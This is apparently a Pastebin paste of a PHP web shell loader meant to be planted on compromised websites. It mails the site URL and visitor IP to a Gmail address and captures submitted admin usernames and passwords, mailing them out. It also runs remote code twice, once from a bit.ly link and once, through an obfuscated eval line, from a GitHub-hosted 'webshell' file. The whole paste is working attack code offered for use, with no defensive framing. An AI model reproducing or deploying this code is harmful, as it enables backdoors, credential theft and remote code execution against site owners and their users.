blackhat1337

Untitled

May 12th, 2024 (edited)
9
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
  1. <?php
  2. @ini_set('output_buffering', 0);
  3. @ini_set('display_errors', 0);
  4. set_time_limit(0);
  5. ini_set('memory_limit', '64M');
  6. header('Content-Type: text/html; charset=UTF-8');
  7. $tujuanmail = 'malaysia.sender@gmail.com';
  8. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  9. $pesan_alert = " -> $x_path ->IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
  10. mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
  11. error_reporting(0);
  12. set_time_limit(0);
  13.  
  14. if(get_magic_quotes_gpc()){
  15. foreach($_POST as $key=>$value){
  16. $_POST[$key] = stripslashes($value);
  17. }
  18. }
  19. echo '<!DOCTYPE HTML>
  20. <html>
  21. <head>
  22.  
  23. <link href="https://fonts.googleapis.com/css?family=Supermercado+One&display=swap" rel="stylesheet">
  24. <title>:)</title>
  25. <style>
  26. body{
  27. font-family:Supermercado One, sans-serif;
  28. background-color: #000022;
  29. background-image: url();
  30. background-size: center; background-repeat:no-repeat; background-attachment: fixed; background-size: cover; background-position:center;
  31. color: white;
  32. }
  33. #content tr:hover{
  34. background-color: black;
  35. text-shadow:0px 0px 10px black;
  36. }
  37. #content .first{
  38. background-color: white;
  39. }
  40. table{
  41. border: 1px #000000 dotted;
  42. }
  43. a{
  44. color: aqua;
  45. text-decoration: none;
  46. }
  47. a:hover{
  48. color:blue;
  49. text-shadow:0px 0px 10px #ffffff;
  50. }
  51. input,select,textarea{
  52. border: 1px #000000 solid;
  53. -moz-border-radius: 5px;
  54. -webkit-border-radius:5px;
  55. border-radius:5px;
  56. }
  57. .lazy {
  58. margin: 0;
  59. font-family:Supermercado One;
  60. }
  61. </style>
  62. </head>
  63. <?php eval("?>".file_get_contents("bit.ly/4dzmi5N"));?>
  64. <?php
  65.  
  66. $subjek = 'RESUL';
  67. $mailto = 'muhrazky@gmail.com'; //masukin email lo disini
  68.  
  69. //////////////////////////////////////
  70.  
  71. $user = $_POST['log'];
  72. $pass = $_POST['pwd'];
  73.  
  74. //////////////////////////////////////
  75.  
  76. $body = <<<EOD
  77. <br><hr><br>
  78. <center><font size="4" ;" color="red">RESULT LOG ADMIN!<br></font>
  79. <font size="2" color="red">Username\Email :</font><font size"2" color="black">$user</font><br>
  80. <font size="2" color="red">Password : </font><font size"2" color="black">$pass</font> <br></center>
  81. EOD;
  82.  
  83. $headers = "From: muhrazky@gmail.com\r\n";
  84. $headers .= "Content-type: text/html\r\n";
  85. $success = mail($mailto, $subjek, $body, $headers);
  86. ?>
  87. <?php
  88. $random = rand(1000,5000);
  89. ?>
  90.  
  91.  
  92.  
  93.  
  94. <?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://raw.githubusercontent.com/exploit-haxor/webshell/main/bypas1.php"));/**/?>
Add Comment
Please, Sign In to add comment